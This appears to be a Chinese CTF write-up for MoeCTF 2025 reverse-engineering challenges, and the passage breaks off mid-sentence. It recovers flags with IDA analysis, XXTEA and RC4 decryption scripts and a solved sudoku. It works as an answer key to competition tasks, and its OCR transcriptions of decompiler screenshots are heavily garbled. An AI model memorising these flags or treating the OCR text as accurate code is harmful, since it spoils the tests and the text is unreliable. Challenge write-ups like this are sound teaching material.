<p>moectf{SSDDDDWWDDSSDDDDSSDDSSSSDDWWDDWWDDWWWWDDDDSSSSAASSSSAAAASSAASSAAWWAAWWWWAAAASSDDSSAASSDDSSSSAAAASSDDDDDDWWWWDDDDSSDDDDWWDDWWAAWWDDDDSSSSSSSSSSSSAAASSSDDDSSSSAASSSSAAAASSAASSAAWWAAWWWWAAAASSDDSSAASSDDSSSSAAAASSDDDDDDWWWWDDDDSSDDDDWWDDWWAAWWDDDDSSSSSSSSSSSSAAAWAWWWAASSAAWWAASSAAAAAAAAAAWWWWAASSSSSSDDDDSSSSSSDDDDDDDDDWWDDDSSDDWWWDDDSSSDDDDDWWAWWDDDDDDDDDDDDDDDDDDDDSSDDDDDDDDWWWWAWWWWWWWWDWWWWWWWWWWWAAWWDWWWWWWWWWWDWWWWWWAAAASSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSAAAWWAAAAAAAAAAAAAAAAAAAWWWDDDDDDDDWWDDDDDDDDDDWWWAWAAWAWWWWWWWWWWWWWDDWWWWAASSAAWWAASSAAAAAAAAAAWWWWAAWWDDWWAAWWDWWWDWWWWDDDDDDDDDDSSDDDDSSSSDSDSSDDSSAASSAAAAWWAAAASSSSAAAAAAWWDDDDWWWWAAWWAWAASSDSSSDD}</p> <h1>17 Two cup of tea</h1> <p>IDA打开定位主函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为:CHAR*V8;//RCX UNSIGNED _INT64 V10; // [RS BYREF [/ [RSP+20H] [RBP-EOH] BE CHAR V11; // [RSP+28H] [RBP-D8H _INT64 V12; 8 // [RSP+30H] [RBP-DOH] BYREF INT V13; // [RSP+38H] [RBP-C8H] INT V14; // [RSP+3CH] [RBP-C4H] [DWORD V15[10];// [RSP+40H][RBP-COH] OWORD V16[2L; // [RSP+68H] [RBP-98H] BYREF _INT64 V17; // [RSP+88H] [RBP-78H] / [RSP+90H] [RBP-70H] BYREF CHAR BUFFER[16]; // [RSP // [RSP+AOH] [RBP-60H] INT128 V19; INT64 V20; [RSP+BOH] [RBP-50H] V3:0LL; V12 : 2LL; V11 三 0; V13 2; V14 三 5; V15[0] ] ; 1566723124; V15[1] -2044068179; 三 V15[2] -1659816037; V15[3] -53136879; V15[4] 1175413710; V15[5] -981373336; 三 -28114771; V15[6] 三 167777774; V15[7] 川 V15[8] -1744380997; 三 -280353208; V15[9] 三 0XD0FCC6A7B8941CAFULL; V10 三 _140001070(ARGC, &amp;V10, &amp;V12); SUB SUB_140001010((CHAR <em>)&amp;FORMAT); IOB_FUNC(O); V4 ACRT FGETS(BUFFER, 100, V4); STRCSPN(BUFFER, "\N"); V5 三 IF ( V5 &gt; 0X64 SUB_140001BE8(); BUFFER[V5]-0; YBUFFER V16[0]三</em>(_OWORD V12 三 V10; V17 三 V20; V16[1] ; V19; 305419896; V13 三 -1698898192; V14 三 B_1400015E0(V16, V6, &amp;V12); SUB_1 -1LL; V7 DO ++V7; WHILE ( BUFFER[V7] ); IF ( V7 - 40 ) WHILE ( *( DWORD *)(CHAR *)V16 + V3 * 4) -- V15[V31 --&gt; <img src="./images/img-13.png" alt="" /></p> <p>数组v15是加密后的数据,v10是key,但经过函数处理的才是我们需要的</p> <p>&lt;!-- 这是一张图片,ocr 内容为:0XD0FCC6A7B8941CAFULL; V10 : SUB_140001070(ARGC, &amp;V10, &amp;V12); --&gt; <img src="./images/img-14.png" alt="" /></p> <p>打开sub_140001070函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为:*)(A3 + 4LL DWORD 3))) 水 V11) (V11 5)))); ((16 (V11 ((V10 (V10 V3 V12 ((V10 &gt;&gt; 11) &amp; 3))) (V10 + *(_DWORD 水 +4LL (V12 &gt;&gt; 5 )(A3 V (16 V12) 5)1); (V12 V13 1640531527; V10 V13; V11 V14 ((V10+ *(_DWORD *)(A3 +4LL * 4LL * (V10 &amp; 3)))) (V14 + (16 * V14) * (V14 &gt;&gt; 5)))))))); V12 V15 ((DWORD *)(A3+ 4LL * (V15 &gt;&gt; 11) &amp; 3)) \ (V15 + (V15 * V15) \ (V15 &gt;&gt; 5)); (V10 V16 1640531527; V10 +三 V16; V14 V17 - (V10 + *(_DWORD *)(A3 + 4LL * (V10 &amp; 3)) \ (V17- (V17 &gt;&gt; 5)))); ((16 * V17) V18 V15 * *(_DWORD *)(A3 + 4LL * (V10 &gt;&gt; 11) &amp; 3)); V10 V19 +1640531527; V10 (V19 A (V18 + ((16 * V18) &lt; (V18 &gt;&gt; 5)))))); V17 V20 ((V10+ *( DWORD *)(A3+ 4LL * (V10 &amp; 3))) (V20+ (V20+ (16 * V20)' (V20 &gt;&gt; 5)))); V21 V18 *(_DWORD *)(A3 + 4LL * (V10 &gt;&gt; 11) &amp; 3))) A (V21 + (16 * V21) A (V21 &gt;&gt; 5))))); V22 (V10 1640531527; V10 +二 V22; V23 V20 ; *( DWORD *)(33 + 4LL * (V10 &amp; 3)) &gt; (V23 + (V23) &gt; (V23 &gt; 5)); (V10 V21 V24 DWORD *)(A3+4LL * (V10 &gt;&gt; 11) &amp; 3))&gt; (V24+(V24+(16 * V24) &amp; (V24 &gt;&gt; 5)); (V10 V25 V10+:1640531527; V26 V23 V25; * (V10 &amp; 3))) (V26 + (16 ((V10 + *(_DWORD *)(A3 + 4LL * V26) (V26 &gt;&gt; 5))))); 米 V27 V24 DWORD *)(A3 + 4LL * (V10 &gt;&gt; 11) &amp; 3)); V28 V10 1640531527; V10 十二 (V28 (V27 + (16 * V27) A (V27 &gt;&gt; 5))))); V26 V29 + <em>(_DWORD <em>)(A3 +4LL * (V10 &amp; 3)))) ((V10 -(16 * V29) ,(V29 &gt;&gt; 5))))); (V29 V27 V30 <em>)(A3+ 4LL * ((V10 &gt;&gt; 11) &amp; 3)))) ((16 * V30) (V30 &gt;&gt; 5))))); (V10+</em>(_DWORD (V30 V31 1640531527; V10 V29 - V31; V32 30-(V10+</em>(_DWORD</em>)(A *)(A3 + 4LL * (V10 &amp; 3))(V32+ (V32+ (16 * V32) (V32 &gt;&gt; 5)); V30 V33 * (V10 &gt;&gt; 11) &amp; 3)))) A (V33 + (16 * V33) (V33 &gt;&gt; 5)))))); )(A3 +4LL *(DWORD 三(V10 V34 +1640531527; V10 V34; V32 V35 9++ *(_DWORD *)(A3+4LL *(V10&amp;3)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) (V10 + * *( ((16 * V35) A (V35 &gt;&gt; 5))))); 三V33 V36 - *(_DWORD *)(A3 + 4LL * (V10 &gt;&gt; 11) &amp; 3)); V10 V37 1640531527; V10 +三 (V36 +((16 * V36) (V36 &gt;&gt; 5))))))); (V37 V35 V38 *(_DWORD *)(A3 + 4LL *(V10 &amp; 3)))))))) (A3 + 4LL * (V38 (V10 V36 - (16 * V38) A (V38 &gt;&gt; 5)))))); V39 *)(A3 + 4LL * (V10 &gt;&gt; 11) &amp; 3))))) DWORD (V39 + (16 * V39) A (V39 &gt;&gt; 5)))); (V10 V40 10 +: 1640531527; V10 V41 三 V38 - V40; *(_DWORD *)(A3+4LL *(V10 &amp; 3))))))))))) ()) (V41 + ((16 * V41) A (V41 &gt;&gt; 5)))))))))))) ) ) ) )&gt; 5)))))))))) (V41 &gt;&gt; 5) 5) 5))))))))))))) ; V42 - V39-(V10+ *)(A3 + 4LL * (V10 &gt;&gt; 11) &amp; 3)) \ (V42 + (16 * V42) \ (V42 &gt;&gt; 5))))))); *(_DWORD V43三(V10] V10+1640531527; V43; V44 V41 (V44 + ((16 * V44) \ (V44 &gt;&gt; 5)))))); *(_DWORD *)(A3 + 4LL * (V10 &amp; 3)))))) (V10 三 V42 V45 ((V10 DWORD *)(A3+4LL * (V10 &gt;&gt; 11) &amp; 3)) &amp; 3)) (V45 + (V45) &amp; (V45 &gt; 5))))))))))))); V44 V46 1640531527; V10 +三 9-(V10+ <em>(DWORD</em>)(A3+4LL <em>(V10 &amp; 3))))))))) (V46 +((16 6 * V46) \ (V46 &gt;&gt; 5))))); V45 (V46+(16</em> V47 *(DWORD 16 * V47) 人 (V47 &gt;&gt; 5)))); 入 (V47+((16 ((V10 &gt;&gt; 11) &amp; 3)) 头 + 4LL )(A3 (V10 V48 1640531527; V10 --&gt; <img src="./images/img-15.png" alt="" /></p> <p>它的作用就是:</p> <p>生成/混淆出 XXTEA 所需的前半部分 key。</p> <pre><code>key = [final_low, final_high, 0x12345678, 0x9ABCDEF0]; </code></pre> <p>之后是加密函数sub_1400015E0,是一个改造过的 XXTEA 解密实现,固定迭代 11 轮。</p> <p>&lt;!-- 这是一张图片,ocr 内容为:二 8 A1[3]; 9 ; A1[4]; 10 ; A1[5]; 111 - A1[6]; 12 三 *A1; 13 ; A1[7]; 27 三 V5; 222 V3; 23 11; WHILE ( 1 ) 1640531527; I V4 V25 *(D &amp;3)); (_DWORD *)(A3 + 4LL * ((UNSIGNED INT)(V4 - 1640531527) V14 V21 : V12 + ((((16 ((V4 - 1640531527) * V6) + (V14 * V3))); (((16 * V3) A (V6 &gt;&gt; 3)) + ((V3 &gt;&gt; 5) 5) (4 * V6))))) V15 : <em>(_DWORD 2) &amp; 3 人 1LL)); * (((UNSIGNED INT)(V4 - 1640531527) &gt;&gt; )(V26+4</em> V6 +二 (V21 A V15) + ((V4 - 1640531527) * * V7)) * (((((16 * V21) (V7 )&gt;&gt; 3)) + ((V21 &gt;&gt; 5) 2 (4 * V7)))))); - 1640531527) &gt;&gt; 2) &amp; 3 A 3LL; V16 - (UNSIGNED INT)(V4 - V17: *(_DWORD <em>)(V26 +4</em> (((UNSIGNED INT)(V4 - 1640531527) &gt;&gt; &gt;&gt; 2) &amp; 3\ 2LL); ((16 * V6) (V8 &gt;&gt; 3)) + ((V6 &gt;&gt; 5) 5) A * V8))))); V7 +三 (V6 A V17)+ (V25 A V8)) 0) * (((16 * V7) * (V9 &gt;&gt; 3)) + ((V7 2&gt; 5) 5) (4 * V9))))); <em>)(V26+4 * V16))) 18 +(V25 A V9)+(V7</em>(DWORD V8 + ) A (V10 &gt;&gt; 3)) + (V8 &gt;&gt; 5) A (4 V10))); (((16 * V8) ( V9 +三 ((V8 A V14) + (V25 人 V10)) ((((() * V11)))); +(19)&gt;&gt; VIE * (((() ( V15)+ V11 &gt; &gt; (4 * (4 * V11 &gt; (4 * V11 &gt; 5)+ (4 * (4 * VII); V18 三 (V10 A V17) + (V25 A V13); V4 V25; V11 +三 V18 \ (((16 * V10) &gt; (V13 &gt;&gt; 3)) + (V1E &gt;&gt; 5) 5) (4 * V13)); 3)) + ((V11 &gt;&gt; 5) &lt; (4 * V27))); ( DWORD <em>)(V26 + 4 * V16)) + (V25 A V27) (((16 * V11) &gt; (V27 &gt; (V27 &gt; V13+(V111 V27 +- (V13 ( VI4) + (V25 A V22)) ((((16 * V13) (V22 &gt; 3) + (V13 &gt;&gt; 5) V22)); 5) (4</em>V (4 (V25 A V21) ((((((16 * V27) (V21 &gt;&gt; 3&gt; 3)) + ((V27 &gt;&gt; 5) V21)))) + V22; V3 ((V272715)+(V25 A3 三 V26; V19 ; V23-- 33 1; V22 三 V3; IF(V19) BREAK; V12 - V21; ESULT - V13; 41[1] - V6; --&gt; <img src="./images/img-16.png" alt="" /></p> <p>解密脚本</p> <pre><code>def xxtea_decrypt_uint32(v, key): n = len(v) delta = 0x9E3779B9 q = 11 # 题里固定跑 11 轮 sum_ = (q * delta) &amp; 0xFFFFFFFF while q &gt; 0: e = (sum_ &gt;&gt; 2) &amp; 3 for p in range(n-1, -1, -1): z = v[p-1] if p &gt; 0 else v[-1] y = v[p] v[p] = (y - (((z &gt;&gt; 5 ^ (v[(p+1) % n] &lt;&lt; 2)) + (v[(p+1) % n] &gt;&gt; 3 ^ (z &lt;&lt; 4))) ^ ((sum_ ^ v[(p+1) % n]) + (key[(p &amp; 3) ^ e] ^ z)))) &amp; 0xFFFFFFFF sum_ = (sum_ - delta) &amp; 0xFFFFFFFF q -= 1 return v # v15: main 函数里的常量数组(10个 32-bit) v15 = [ 1566723124, -2044068179, -1659816037, -53136879, 1175413710, -981373336, -28114771, 167777774, -1744380997, -280353208 ] v15 = [x &amp; 0xFFFFFFFF for x in v15] # key 的两个部分 key_low = 0x12345678 key_high = 0x9ABCDEF0 final_low = 1667592045 final_high = 555837044 key = [final_low, final_high, key_low, key_high] # 解密 dec = xxtea_decrypt_uint32(v15[:], key) plain = b''.join(x.to_bytes(4, 'little') for x in dec) print("解密结果:", plain.decode(errors="ignore")) </code></pre> <p>moectf{X7e4_And_xx7EA_I5_BeautifuL!!!!!}</p> <h1>19 rusty_sudoku</h1> <p>shift+F12 查看字符串</p> <p>&lt;!-- 这是一张图片,ocr 内容为:CALLED RESULT::UNWRAP() ON AN ERR VALUE RDATA:0--:0000002C INVALIDENTRYCELLCH NOTENOUGHCELLSFOOMANYCELLSMISSINGCOMMENTDELIMITER .RDATA:0...0000031 /RUSTE/294836836ED69D5F68DBO1964CDF2AF4A8609CB2\1IBRARY/ALLOC\ERE\ERE\: .RDATA:000000004B .RDATA:0-000000000E INVALID INPUT. SRE LMAIN.RS RDATA:000000000051 6.8.3.3.3.18.3.3.3.3.3.3.3.3.3.3. YOU SHOULD NOT CHANGE THE BOARD! IN I NILL SIVE YOU THE FLAGAT JOUR ANSVER IN ONE LINE LINE (WITHOUT SPACES),LNFOR EXEMPLE, 6542197865 WELCOWO TO HOECTE 2025!\PLEASE <em>WFIND¥</em> MY SUDAKU AND FILL IT CORTECTLY.\NAND THEN I WILL .RDATA:0000000199 TRY AGAIN IN CONGRATULATION:/N YOUR FLAG IS MOECTF[ INVALIDSOLUTION ININININININININININININININININ CALLED RESULT::UNWRAPO ON AN BRR VALUE /RUSTC/29483G9SEED69D5F6+D601964CDF2AF4DS6E9CB2((LIBRARY1LCORE)(SRE)(STR((STR((PATTERN.RS UTF8ERRORVALID_UP_TOERROR_LEN LEGTESTES EN TE REARTERTENTE .RDATA:0.00000002F INININ_ RDATA:00000000006 C --&gt; <img src="./images/img-17.png" alt="" /></p> <p>点进去看到</p> <p>&lt;!-- 这是一张图片,ocr 内容为:RDATA:00000001400C2227 QP DB'.6.8..7.18.3........1..8...15.9....4.2.......................................................6.... RDATA:00000001400C2228 A68718379181594 ; DATA XREF: RUSTY_SUDOKU::MAIN+48410 RDATA:00000001400C2228 DB '...5..7..3....5." RDATA:00000001400C2269 CH DB 'YOU SHOULD NOT CHANGE THE BOARD!' RDATA:000000001400C2279 AYOUSHOULDNOTCH 0 .RDATA:0000001400C2279 ; DATA XREF: RUSTY_SUDOKU::MAIN+63310 WELCOME TO MOECTF 2025!",OAH .RDATA:00000001400C2299 AWELCOMETOMOECT DB ; DATA XREF: .RDATA:OFF 1400C2438LO .RDATA:0000001400C2299 PLEASE <strong>FIND</strong> MY SUDOKU AND FILL IT CORRECTLY... OAH QP RDATA:000000001400C22B1 DB 'AND THEN I WILL GIVE YOU THE FLAG.',OAH RDATA:00000001400C22E2 DB 'INPUT YOUR ANSWER IN ONE LINE (WITHOUT SPACES).', OAH ,RDATA:00000001400C2305 DB IFOR B'FOR EXAMPLE, 8542197633978654212614739857851263946495381721329478' ,RDATA:0000001400C2335 QP .RDATA:0000001400C2376 56926384517513792648478651239 REPRESENTS:'. OAH 854|219 763',0AH ,RDATA:00000001400C23A0 397|865|421',0AH DB RDATA:00000001400C23AC |473|985',0AH '261 QP ,RDATA:00000001400C23B8 OAH DB RDATA:00000001400C23C4 DB '785|126 394 OAH RDATA:00000001400C23D0 OAH 172 B49 538 .RDATA:00000001400C23DC OAH .RDATA:0000001400C23E8 DB'132947 856 OAH ,RDATA:00000001400C23F4 DB'926|384 517',0AH RDATA:00000001400C2400 DB 513|792|648',0AH RDATA:000000001400C240C 478651 239元 QP OAH RDATA:00000001400C2418 DB OAH RDATA:00000001400C2424 DB 'YOUR ANSWER:',OAH RDATA:00000001400C2425 .RDATA:0000001400C2432 DB ALIGN 8 RDATA:00000001400C2433 DQ OFFSET AWELCOMETOMOECT RDATA:00000001400C2438 OFF_1400C2438 , DATA XREF: RUSTY SUDOKU::MAIN+17TO RDATA:00000001400C2438 3 "WELCOME TO MOECTF 2025!\NPLEASE *<em>FIND</em>".. RDATA:00000001400C2438 RDATA:00000001400C2440 .RDATA:0000001400C2441 O .RDATA:00000001400C2442 --&gt; <img src="./images/img-18.png" alt="" /></p> <p>通过交叉引用,定位到rusty_sudoku::main函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为:3) _INT64 A2,__INT64 INT64 _FASTCALL RUSTY_SUDOKU::MAIN(_INT64 A - A1, _INT128 <em>V3; // RDI _INT64 V4;// RDX SIZE_T V5; // RDX __INT8</em>V6;// RCX UNSIGNED *V7;// RSI INT8 UNSIGNED *V8; // R9 INT8 UNSIGNED <em>V9;// R8 INT8 UNSIGNED V10;// CHAR R11 _INT8</em>V11;// RBX UNSIGNED INT8 <em>V12; / RAX UNSIGNED INT V13;// R11D UNSIGNED INT V14; 1/ R9D INT V15; // R14D INT V16;// EBP UNSIGNED INT V17; // EBX _INT64 V18;// RBX CHAR V19;// B1 _INT8</em>V20;// R11 UNSIGNED L;//ESI INT V21; UNSIGNED CHAR V22; // BL CHAR V23; // BP INT V24;// EBP INT V25;// EBX UNSIGNED INT V26; / EBX SIZE_T V27; / R15 INT64 V28;// R14 INT64 V29;// RAX _INT64 V30;// R9 _INT64 V31; / RDX _INT64 V32; // RAX INT V33; // ECX INT V34; // EDX INT V35; // R8D _INT64 RESULT; // RAX _INT64 V37; // RAX _INT64 V38; // RDX INT V39; // R8D INT V40; // R9D INT V41; // R11D INT V42; / R10D INT V43; // R10D INT V44; / //EBP --&gt; <img src="./images/img-19.png" alt="" /></p> <p>分析函数以及在字符串中看到的提示,就是找到一个正确的9*9数独,再回到字符串视图页面,发现有一个未补全的数独,点进去看到完整的数独</p> <p>&lt;!-- 这是一张图片,ocr 内容为:...8..7.18.3............................................................8....8....................... 00000051 .RDATA:0. YOU SHOULD NOT CHANGE THE BOARD! 00000020 GE RDATA:0 --&gt; <img src="./images/img-20.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为:3.3......7.9........8...15.9..4.2......................3948. 1.6..8..7.18. .RDATA:00000001400C2228 A68718379181594 594 DB ..3948. DATA XREF: RUSTY_SUDOKU::MAIN+48410 RDATA:00000001400C2228 QP B '..5..7..3.....5.' RDATA:00000001400C2269 CH DB RDATA:00000001400C2279 AYOUSHOULDN THE BOARD! YOU SHOULD NOT CHANGE --&gt; <img src="./images/img-21.png" alt="" /></p> <p>使用在线工具</p> <p>&lt;!-- 这是一张图片,ocr 内容为:成功!解法找到了. 7 5 2 3 8 6 4 9 1 7 5 2 4 8 L 9 3 6 撤消 全部清除 擦除 31 5 6 7 4 2 9 8 7 415 8 2 2 6 6 3 3 43 7 5 6 2 8 3 1 6 1 4 2789 5 6 6 5 4 7 5 6 1 2 3 48 6 27 3 5 6 8 1 8 9 4237981 5 8 6 6 --&gt; <img src="./images/img-22.png" alt="" /></p> <p>将 369184572185327694274956831632879415897541263541632789756213948918465327423798156 作为程序的输入</p> <p>&lt;!-- 这是一张图片,ocr 内容为:E:\MOECTF2025\RUSTY_SUDOKU&gt;. USTY_SUDOKU_FINAL.EXE WELCOME TO MOECTF 2025! PLEASE <strong>FIND</strong> MY SUDOKU AND FILL IT CORRECTLY. AND THEN I WILL GIVE YOU THE FLAG. INPUT YOUR ANSWER IN ONE LINE (WITHOUT SPACES). FOR EXAMPLE,854219763397865421261473985785123946394649538172132947856926384517513792648478651239 EPRESENTS: 854|219|763 397 865|421 473|985 261 126|394 785 538 172 649 132 947|856 384|517 926 792 648 513 478|651|239 YOUR ANSWER: 369184572185327694274956831632879415897541263541632789756213948918465327423798156 CONGRATULATION YOUR FLAG IS MOECTFLA8C79927D4E830C3FE52E79F410216A0} --&gt; <img src="./images/img-23.png" alt="" /></p> <p>moectf{a8c79927d4e830c3fe52e79f410216a0}</p> <h1>01 speed</h1> <p>IDA定位主函数,发现返回到WinMain函数里</p> <p>&lt;!-- 这是一张图片,ocr 内容为:V3 - 1; 子 ( (_BYTE)V5 - 34 ) IF ELSE V3 A: 1U; IF ( ISMBBLEAD(V5) ) O) - (V4[1] 1; V4 +三 ++V4; (CHAR*)&amp;UNK_7FF7D22A5010; V4 LABEL_15: MEMSET(&amp;STARTUPINFO, O, SIZEOF(STARTUPINFO)); GETSTARTUPINFOA(&amp;STARTUPINFO); WSHOWWINDOW 10; IF ( (STARTUPINFO.DWFLAGS &amp; 1) !- 0 ) IF WSHOWWINDOW - STARTUPINFO.WSHOWWINDOW; RETURN WINMAIN((HINSTANCE)REFPTR- IMAGEBASE, OLL, V4, WSHOWWINDOW); --&gt; <img src="./images/img-24.png" alt="" /></p> <p>打开该函数,这个函数注册了一个窗口,只显示1秒,就立即销毁,真正的逻辑在WndProc里</p> <p>&lt;!-- 这是一张图片,ocr 内容为:-STDCALL WINMAIN(HINSTANCE HINSTANCE, HINSTANCE HPREVINSTANCE INT [RSP+60H] [RBP-20H] BYREF MSG MSG; WNDCLASSA WNDCLASS; [H06+DSR] BYREF [RBP+10H] [RSP+EOH] CHAR CLASSNAME[24]; [RBP+60H] BYREF HWND HWND;// [RSP+F8H] [RBP+78H] STRCPY(CLASSNAME, "SAMPLE WINDOW CLASS"); MEMSET(&amp;WNDCLASS, O, SIZEOF(WNDCLASS)); (WNDPROC)WNDPROC; WNDCLASS.LPFNWNDPROC HINSTANCE; WNDCLASS.HINSTANCE WNDCLASS.LPSZCLASSNAME CLASSNAME; REGISTERCLASSA(&amp;WNDCLASS); HWND : CREATEWINDOWEXA( O, CLASSNAME, "MOECTF 2025", OXCA0000U, 0X80000000 0X80000000, 400元 100元 OLL, OLL, HINSTANCE, OLL); IF ( !HWND RETURN O; SHOWWINDOW(HWND, NSHOWCMD); UPDATEWINDOW(HWND); SLEEP(1U); DESTROYWINDOW(HWND); MEMSET(&amp;MSG, O, SIZEOF(MSG)); GETMESSAGEA(&amp;MSG, OLL, 0, 0) &gt; 0 ) WHILE TRANSLATEMESSAGE(&amp;MSG); DISPATCHMESSAGEA(&amp;MSG); O; RETURN 子 --&gt; <img src="./images/img-25.png" alt="" /></p> <p>打开WndProc函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为:POSTQUITMESSAGE(0); RETURN OLL; ELSE IF ( A2 : 15 ) HDC - BEGINPAINT(AL, &amp;PAINT); "YOUR FLAG IS "); STRCPY(DESTINATION, V7 三 0; OLL; V8 V9 0LL; V10 0LL; OLL; V11 OLL; V12 OLL; V13 OLL; V14 OLL; V15 OLL; V16 OLL; V17 OLL; V18 OLL; V19 OLL; V20 V21 0LL; *(_QWORD *)STR - OX7F1B3E885EF9160LL; V25 0X2CD336BCB0464A89LL; V26[0] 三 0XEF5FC91642917EE1ULL; *(_QWORD *)(CHAR *)V26 + 6) 三 0X739D40A4E356EF5FLL; STRCPY(V23, "MYLITTLEPONY"); V28 12; V27 三 STRLEN(STR); *)STR, V27, (CONST UNSIGNED __INT8 *)V23, 12); RC4CRYPT((UNSIGNED._INT8 STRCAT(DESTINATION, STR); GETCLIENTRECT(A1, &amp;RECT); DRAWTEXTA(HDC, DESTINATION, -1, &amp;RECT, OX40005U); ENDPAINT(AL, &amp;PAINT); RETURN OLL; ELSE RETURN DEFWINDOWPROCA(AL, A2, A3, A4); --&gt; <img src="./images/img-26.png" alt="" /></p> <p>加密算法为RC4,密钥 (key): "mylittlepony"</p> <p>密文</p> <p>&lt;!-- 这是一张图片,ocr 内容为:)STR0X7F1B3E885EF9160LL; QWORD 0X2CD336BCB0464A89LL; V25 V26[0] 0XEF5FC91642917EE1ULL; )(CHAR *)V26 + 6) 三 0X739D40A4E356EF5FLL; (_QWORD --&gt; <img src="./images/img-27.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为:__FASTCALL RC4CRYPT(UNSIGNED __INT8 *AL, INT A2, INT64 CO _INT64 RESULT; // R RAX [RSP+OH][RBP-80H] INT64 BYREF LINT8 V6[257]; / [RSP+20H] [RBP-60H] UNSIGNED _INT8 V7; // [RSP+121H] [RBP+A1H] UNSIGNED INT8 V83//[RSP+122H][RBP+AZH] UNSIGNED _INT8 V9; // [RSP+123H] [RBP+A3H] IGNED UNSI INT I; / [RSP+124H] [RBP+A4H] UNSIGNED [RSP+128H] [ [ ] [RBP+A8H] INT V11; [RSP+12CH] INT V12; [RBP+ACH] _INT8 *)&amp;V5 + 32, A3, A4); RC4INIT((UNSIGNED V12 0; V11 FOR(I-0;;++++I) } RESULT : I; IF (INT)I &gt;: A2 ) BREAK; 三 (V12 + 1) % 256; V12 V11 三 (V6[V12] + V11) % 256; V9 三 V6[V12]; V6[V12] ; V6[V11]; V6[V11] 三 V9; V8 三 V6[V12] + V6[V11]; V7 - V6[V8]; A1[I] - V7; RETURN RESULT; --&gt; <img src="./images/img-28.png" alt="" /></p> <pre><code>def rc4_crypt(key: bytes, data: bytes) -&gt; bytes: # simple RC4 (KSA + PRGA) S = list(range(256)) j = 0 # KSA for i in range(256): j = (j + S[i] + key[i % len(key)]) &amp; 0xFF S[i], S[j] = S[j], S[i] # PRGA i = 0 j = 0 out = bytearray(len(data)) for idx in range(len(data)): i = (i + 1) &amp; 0xFF j = (j + S[i]) &amp; 0xFF S[i], S[j] = S[j], S[i] K = S[(S[i] + S[j]) &amp; 0xFF] out[idx] = data[idx] ^ K return bytes(out) def main(): key = b"mylittlepony" str_part = (0x07F1B3E885EF9160).to_bytes(8, "little") v25 = (0x2CD336BCB0464A89).to_bytes(8, "little") v26 = bytearray((0xEF5FC91642917EE1).to_bytes(8, "little")) overwrite = (0x739D40A4E356EF5F).to_bytes(8, "little") v26[6:6+8] = overwrite cipher_bytes = str_part + v25 + bytes(v26) plaintext = rc4_crypt(key, cipher_bytes) print("raw decrypted bytes:", plaintext) try: s = plaintext.decode("utf-8") except UnicodeDecodeError: s = plaintext.decode("utf-8", errors="ignore") print("decoded (utf-8, ignoring errors):") print(s) if __name__ == "__main__": main() </code></pre> <p>&lt;!-- 这是一张图片,ocr 内容为:M LOCAL WINDOWS DEBUGGER UNEXPLORED EXTERNAL SYMBOL LIBRARY FUNCTION DATA REGULAR FUNCTION LUMINA FUNCTION INSTRUCTION IDA VIEW-RIP, GENERAL REGISTERS. MODULES, THREADS, HEX VIEW-1. STACK VIEW IDA VIEW-RIP MOECTF 2025 YOUR FLAG IS MOECTFJUST_DYN@MIC_D3BUGGLNG] E:\MOECTF2025\SPEED\SPEED.EX NAME PORTABLE EXECUTABLE FOR AMD6 NAT 140000000 LINAGEBASE AAATIONOOJJ/AAAA:7XA7 6897959C (SAT AUG 09 18:38:2 TIMESTAMP TEXT:00007FF66C6E1000 SECTION 1. (VIRTUAL ADDRESS 00001000) TEXT:00007FF66C6E1000 000021C8 TEXT:00007FF66C6E1000 VIRTUAL SIZE SECTION SIZE IN FILE 00002200 TEXT:00007FF66C6E1000 OFFSET TO RAW DATA FOR SECTION: 0000600 TEXT:00007FF66C6E1000 S 6000060: TEXT DATA EXECUTABLE READA FLAGS 6 .TEXT:0007FF66C6E1000 ;FLA ALIGNMENT DEFAULT TEXT:00007FF66C6E1000 TEXT:00007FF66C6E1000 SEGMENT TYPE: PURE CODE .TEXT:00007FF66C6E1000 SEGMENT PERMISSIONS: READ/EXECUTE TEXT:00007FF66C6E1000 _TEXT SEGMENT PARA PUBLIC 'CODE' USE64 TEXT:00007FF66C6E1000 ASSUME CS:_TEXT TEXT:00007FF66C6E1000 .TEXT:00007FF66C6E1000 ;ORG 7FF66C6E1000H .TEXT:00007FF66C6E1000 ASSUME ES:NTDLL_DLL, SS:NTDLL_DLL, DS:_DATA, .TEXT:0007FF66C6E1000 TEXT:00007FF66C6E1000 TEXT:00007FF66C6E1000 MINGW_INVALIDPARAMETERHANDLE VOID CDEC1 .TEXT:00007FF66C6E1000 _MINGW_INVALIDPARAMETERHANDLER PROC NEAR .TEXT:00007FF66C6E1000 TEXT:00007FF66C6E1000 RETN _MINGW_INVALIDPARAMETERHANDLER ENDP TEXT:00007FF66C6E1000 TEXT:00007FF66C6E1000 --&gt; <img src="./images/img-29.png" alt="" /></p> <p>moectf{Just_dyn@mic_d3bugg1ng}</p> <h1>04 catch</h1> <p>定位主函数,</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-30.png" alt="" /></p> <p>打开solve函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-31.png" alt="" /></p> <p>看到提示,打开sub_114514()函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-32.png" alt="" /></p> <p>发现是根据enc函数进行加密</p> <p>flag字符串为</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-33.png" alt="" /></p> <p>enc函数就是一个简单的异或</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-34.png" alt="" /></p> <p>异或结果为</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-35.png" alt="" /></p> <p>显然不是我么们的flag,回到刚才的提示flag就藏在项目里,我们查看字符串看到可疑对象</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-36.png" alt="" /></p> <p>使用解码工具一键解码</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-37.png" alt="" /></p> <p>Rot13解码: moectf{S4m3_Tr1ck_with_@flower_desuwa}</p> <h1>12 have_fun</h1> <p>点开WinMain函数,是一个典型的 Win32 GUI 程序入口(WinMain)的反编译版</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-38.png" alt="" /></p> <p>入口 